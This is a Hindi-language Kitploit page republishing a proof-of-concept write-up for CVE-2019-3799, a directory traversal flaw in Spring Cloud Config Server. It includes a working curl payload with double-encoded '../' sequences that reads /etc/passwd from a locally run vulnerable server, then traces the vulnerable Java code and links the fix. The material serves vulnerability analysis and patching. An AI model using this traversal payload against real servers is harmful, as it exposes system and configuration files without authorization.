Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-3799 — CVE-2019-3799 - Spring Cloud Config Server: डायरेक्टरी ट्रैवर्सल < 2.1.2, 2.0.4, 1.4.6 | Kitploit
उपकरण/GitHubGitHub/mpgn/cve-2019-3799
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmpgn/cve-2019-3799

CVE-2019-3799

CVE-2019-3799 - Spring Cloud Config Server: डायरेक्टरी ट्रैवर्सल < 2.1.2, 2.0.4, 1.4.6

रिपॉजिटरी देखें
31547 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-3799 - स्प्रिंग-क्लाउड-कॉन्फिग-सर्वर डायरेक्टरी ट्रैवर्सल < 2.1.2, 2.0.4, 1.4.6

स्प्रिंग क्लाउड कॉन्फिग सर्वर < 2.1.2, 2.0.4, 1.4.6 संस्करणों में डायरेक्टरी ट्रैवर्सल / पथ ट्रैवर्सल / फ़ाइल सामग्री प्रकटीकरण की भेद्यता है।

स्प्रिंग क्लाउड कॉन्फिग, संस्करण 2.1.x (2.1.2 से पहले), संस्करण 2.0.x (2.0.4 से पहले), और संस्करण 1.4.x (1.4.6 से पहले), और पुराने असमर्थित संस्करण, स्प्रिंग-क्लाउड-कॉन्फिग-सर्वर मॉड्यूल के माध्यम से एप्लिकेशन को मनमाने कॉन्फ़िगरेशन फ़ाइलों को परोसने की अनुमति देते हैं। एक दुर्भावनापूर्ण उपयोगकर्ता या हमलावर, एक विशेष रूप से तैयार URL का उपयोग करके अनुरोध भेज सकता है जो डायरेक्टरी ट्रैवर्सल हमले का कारण बन सकता है।

स्क्रीनशॉट_1

Vern ([email protected]) द्वारा पाया गया

सुरक्षा सलाहकार

  • https://pivotal.io/security/cve-2019-3799
  • https://spring.io/blog/2019/04/17/cve-2019-3799-spring-cloud-config-2-1-2-2-0-4-1-4-6-released

तकनीकी विश्लेषण

  • https://chybeta.github.io/2019/04/18/%E3%80%90CVE-2019-3799%E3%80%91-Directory-Traversal-with-spring-cloud-config-server/

प्रूफ ऑफ कॉन्सेप्ट

  1. स्प्रिंग क्लाउड कॉन्फिग का एक संवेदनशील संस्करण डाउनलोड करें https://github.com/spring-cloud/spring-cloud-config
  2. एप्लिकेशन चलाएँ
cd spring-cloud-config-server                                                                                                                                                                     
../mvnw spring-boot:run
  1. शोषण करें
curl http://127.0.0.1:8888/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd                                                                                                    

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

भेद्यता

हमेशा की तरह, दस्तावेज़ीकरण पढ़कर हम प्रासंगिक जानकारी प्राप्त कर सकते हैं:

सादा पाठ फ़ाइल परोसना: https://cloud.spring.io/spring-cloud-static/spring-cloud-config/1.3.1.RELEASE/#_serving_plain_text

कॉन्फिग सर्वर ये एक अतिरिक्त एंडपॉइंट के माध्यम से /{name}/{profile}/{label}/{path} पर प्रदान करता है जहाँ "name", "profile" और "label" का वही अर्थ है जो नियमित एनवायरनमेंट एंडपॉइंट का है, लेकिन "path" एक फ़ाइल नाम है (जैसे log.xml)।

सर्वर ये एक अतिरिक्त एंडपॉइंट के माध्यम से /{name}/{profile}/{label}/{path} पर प्रदान करता है।

दस्तावेज़ से एक और दिलचस्प जानकारी:

VCS आधारित बैकएंड (git, svn) के साथ फ़ाइलें स्थानीय फ़ाइलसिस्टम पर चेक आउट या क्लोन की जाती हैं। डिफ़ॉल्ट रूप से उन्हें config-repo- उपसर्ग के साथ सिस्टम अस्थायी निर्देशिका में रखा जाता है। लिनक्स पर, उदाहरण के लिए यह /tmp/config-repo- हो सकता है।

जब हम http://127.0.0.1:8888/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd भेजते हैं तो क्या होता है:

  1. अनुरोध को मैप किया जाता है

https://github.com/spring-cloud/spring-cloud-config/blob/3c0348ca624f9f3b370797799a3608840fed2d8b/spring-cloud-config-server/src/main/java/org/springframework/cloud/config/server/resource/ResourceController.java#L71

@RequestMapping("/{name}/{profile}/{label}/**")
public String retrieve(@PathVariable String name, @PathVariable String profile,
    @PathVariable String label, ServletWebRequest request,
    @RequestParam(defaultValue = "true") boolean resolvePlaceholders)
    throws IOException {
  String path = getFilePath(request, name, profile, label);
  return retrieve(request, name, profile, label, path, resolvePlaceholders);
}
  1. फ़ंक्शन retrieve फ़ंक्शन findOne को कॉल करता है

https://github.com/spring-cloud/spring-cloud-config/blob/3c0348ca624f9f3b370797799a3608840fed2d8b/spring-cloud-config-server/src/main/java/org/springframework/cloud/config/server/resource/ResourceController.java#L103

synchronized String retrieve(ServletWebRequest request, String name, String profile,
    String label, String path, boolean resolvePlaceholders) throws IOException {
  name = resolveName(name);
  label = resolveLabel(label);
  Resource resource = this.resourceRepository.findOne(name, profile, label, path); // path: ..%2f..%2f..%2f..%2f..%2f../etc/passwd
  if (checkNotModified(request, resource)) {
    // Content was not modified. Just return.
    return null;
  }
  // ensure InputStream will be closed to prevent file locks on Windows
  try (InputStream is = resource.getInputStream()) {
    String text = StreamUtils.copyToString(is, Charset.forName("UTF-8"));
    if (resolvePlaceholders) {
      Environment environment = this.environmentRepository.findOne(name,
          profile, label);
      text = resolvePlaceholders(prepareEnvironment(environment), text);
    }
    return text;
  }
}
  1. फ़ंक्शन findOne कॉल किया जाता है:
public synchronized Resource findOne(String application, String profile, String label, String path) {
  if (StringUtils.hasText(path)) {
    String[] locations = this.service.getLocations(application, profile, label).getLocations(); // /tmp/config-repo-<randomid>
    try {
      for (int i = locations.length; i-- > 0; ) {
        String location = locations[i]; // [1]..%2f..%2f..%2f..%2f..%2f../etc/passwd
        for (String local : getProfilePaths(profile, path)) {
            Resource file = this.resourceLoader.getResource(location).createRelative(local); // /tmp/config-repo-<randomid>/..%2f..%2f..%2f..%2f..%2f../etc/passwd
            if (file.exists() && file.isReadable()) {
                return file; // /tmp/config-repo-<randomid>/..%2f..%2f..%2f..%2f..%2f../etc/passwd
            }
          }
        }
      }
    }
    catch (IOException e) {
        throw new NoSuchResourceException(
                "Error : " + path + ". (" + e.getMessage() + ")");
    }
  }
  throw new NoSuchResourceException("Not found: " + path);
}
  1. फिर फ़ंक्शन retrieve StreamUtils.copyToString(is, Charset.forName("UTF-8") के साथ फ़ाइल को पढ़ता है जो /tmp/config-repo-<randomid>/..%2f..%2f..%2f..%2f..%2f../etc/passwd को /etc/passwd में बदल देता है जिसके परिणामस्वरूप फ़ाइल /etc/passwd का खुलासा होता है।

स्क्रीनशॉट_4


फिक्स: https://github.com/spring-cloud/spring-cloud-config/commit/3632fc6f64e567286c42c5a2f1b8142bfde505c2

स्क्रीनशॉट

From 3632fc6f64e567286c42c5a2f1b8142bfde505c2 Mon Sep 17 00:00:00 2001
From: Spencer Gibb <[email protected]>
Date: Tue, 2 Apr 2019 14:16:10 -0400
Subject: [PATCH] Cleans invalid paths

fixes gh-1355
---
 .../resource/GenericResourceRepository.java   | 165 ++++++++++++++++--
 .../GenericResourceRepositoryTests.java       |  18 ++
 2 files changed, 170 insertions(+), 13 deletions(-)
टूल डाउनलोड करें